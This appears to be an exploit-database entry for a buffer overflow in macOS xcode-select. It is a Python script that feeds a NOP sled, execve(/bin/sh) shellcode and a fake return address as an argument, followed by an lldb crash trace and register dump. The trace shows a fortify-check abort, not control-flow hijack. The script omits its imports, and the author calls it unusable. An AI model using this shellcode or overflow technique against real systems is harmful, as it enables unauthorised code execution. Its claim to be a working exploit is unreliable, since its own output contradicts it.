# Exploit Title: xcode-select - buffer overflow # Description: xcode-select controls the location of the developer directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD development tools. # Date: Tuesday 23 2014 # Exploit Author: Juan Sacco # Vendor Homepage: https://developer.apple.com # Software Link: https://developer.apple.com/xcode/ # Version: 2333 # Tested on: 13.4.0 Darwin Kernel Version 13.4.0 # CVE : None junk = "\x90"*5631 shellcode = "\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80" #OSX/x86 intel - execve(/bin/sh) - 24 bytes buffer = "\x90\x90\x90\x90"*89 eip = "\x7f\xff\x8e\x19\x98\x66" print "# xcode-select is prone to an overflow" print "# Wasting CPU clocks on unusable exploits" print "# This is exploit is for educational purposes" try: subprocess.call(["xcode-select", junk+shellcode+buffer+eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "xcode-select not found!" else: print "Error executing exploit" raise Process 5932 launched: '/usr/bin/xcode-select' (x86_64) Process 5932 stopped * thread #1: tid = 0x8358c, 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10 libsystem_kernel.dylib`__pthread_kill + 10: -> 0x7fff8e199866: jae 0x7fff8e199870 ; __pthread_kill + 20 0x7fff8e199868: movq %rax, %rdi 0x7fff8e19986b: jmpq 0x7fff8e196175 ; cerror_nocancel 0x7fff8e199870: ret (lldb) (lldb) bt * thread #1: tid = 0x8358c, 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT * frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10 frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92 frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125 frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181 frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48 frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16 frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34 frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157 frame #8: 0x0000000100006315 libxcselect.dylib`xcselect_find_developer_contents_from_path + 116 frame #9: 0x0000000100000e75 xcode-select`___lldb_unnamed_function3$$xcode-select + 57 frame #10: 0x0000000100001562 xcode-select`___lldb_unnamed_function5$$xcode-select + 1083a (lldb) register r -a General Purpose Registers: rax = 0x0000000000000000 rbx = 0x00007fff769df310 libsystem_pthread.dylib`_thread rcx = 0x00007fff5fbfce18 rdx = 0x0000000000000000 rdi = 0x0000000000000d0b rsi = 0x0000000000000006 rbp = 0x00007fff5fbfce40 rsp = 0x00007fff5fbfce18 r8 = 0x00000000fffffc00 r9 = 0x00007fff5fbfce00 r10 = 0x0000000008000000 r11 = 0x0000000000000206 r12 = 0x0000000000000400 r13 = 0x000000000000000e r14 = 0x0000000000000006 r15 = 0x00007fff5fbfd120 rip = 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10 rflags = 0x0000000000000206 cs = 0x0000000000000007 fs = 0x0000000000000000 gs = 0x0000000000030000 eax = 0x00000000 ebx = 0x769df310 ecx = 0x5fbfce18 edx = 0x00000000 edi = 0x00000d0b esi = 0x00000006 ebp = 0x5fbfce40 esp = 0x5fbfce18 r8d = 0xfffffc00 r9d = 0x5fbfce00 r10d = 0x08000000 r11d = 0x00000206 r12d = 0x00000400 r13d = 0x0000000e r14d = 0x00000006 r15d = 0x5fbfd120